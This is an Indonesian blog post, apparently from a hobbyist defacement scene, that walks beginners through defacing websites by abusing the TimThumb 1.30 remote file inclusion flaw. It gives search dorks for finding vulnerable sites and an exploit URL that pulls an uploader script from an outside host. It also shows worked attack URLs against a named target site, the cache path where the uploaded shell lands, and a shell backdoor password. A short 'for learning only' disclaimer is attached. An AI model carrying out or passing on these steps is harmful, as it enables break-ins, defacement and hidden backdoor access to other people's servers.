» » » » Deface Upload Shell Timthumb v1.30

Deface Upload Shell Timthumb v1.30

, ,

Assalamu'alaikum...

Di postingan pertama saya ini, saya mau berbagi tutorial cara deface upload shell buat pemula saja :)

Buat kakak² saya yang sudah pro, disimak aja🙏🏻 tapi juga masukannya buat saya
Ok langsung saja siapkan bahan²nya:
1. Poc timthumb 1.30

Dork:
inurl:kinheditor
inurl:timthumb.php?src=

2. Exploit:
http://flickr.com.irfanmuhluster.web.id/upgan.php
Jika belum punya Script Deface

Download Disini/Here...!

Shell Backdoor Disini/Here...!
Login Shell: mbojo

Gunakan dork diatas untuk mencari website target dan pilih salah satu atau lebih juga tidak apa-apa:v



Cek versi timthumb target dengan menambahkan exploit "thumb.php" di belakang link website target.

contoh: http://webcom.co.li/thumb.php

jika muncul keterangan seperti gambar dibawah ini:



_no image specified_
_Query String:_
_TimThumb version: 1.30 (vuln)

Maka tambahkan exploitnya, di belakang website target.
Contoh:
http://webcom.co.li/thumb.php?src=http://flickr.com.irfanmuhluster.web.id/upgan.php

Dan klik "buka/enter" dan tunggu hingga keluar keterangan seperti ini:


Unable to open image:/ home/trungtamgi/domains/webcom.co.li/public_html/cache/external_956a7d5dfaf7d2f3f98cd7d0bda00733.php
Query String : src=http://flickr.com.irfanmuhluster.web.id/upgan.php
TimThumb version : 1.30

Simak Juga:
Cara Membuat Vidio Intro Online Gratis

Nah jika sudah seperti itu tempat untuk upload shellnya berada di cache/external_rondomnomber.php
Contoh seperti dibawah ini:

"/cache/external_956a7d5dfaf7d2f3f98cd7d0bda00733.php"

tinggal di copy paste di belakang webtarget,

contoh:
http://webcom.co.li/cache/external_956a7d5dfaf7d2f3f98cd7d0bda00733.php

Dan klik "buka/enter" maka akan muncul tempat kita uplaod file.php nya. Contoh:

tinggal klik pilih untuk memilih file.php dan klik upload. Dan tunggu proses hingga selesai terUpload shellbackdoor nya...

Akses file, contoh:
http://webcom.co.li/cache/filekmu.php


Sukses...

Sekian tutorial dari saya, semoga bermanfaat dan mohon maaf kalau ada yang salah...

Jika masih kurang mengerti, silahkan kunjungi vidio: Disini/Here...!

Note:
Tutorial ini semata hanya untuk pembelajaran saja, saya tidak bertanggung jawab atas kerugian dalam bentuk apapun dari tindakan anda. Atas tutorial ini

Wassalamu'alaikumuwarohmatullahiwabarokatuh....

Subscribe to receive free email updates:

0 Response to "Deface Upload Shell Timthumb v1.30"

Posting Komentar

Langganan: Posting Komentar (Atom)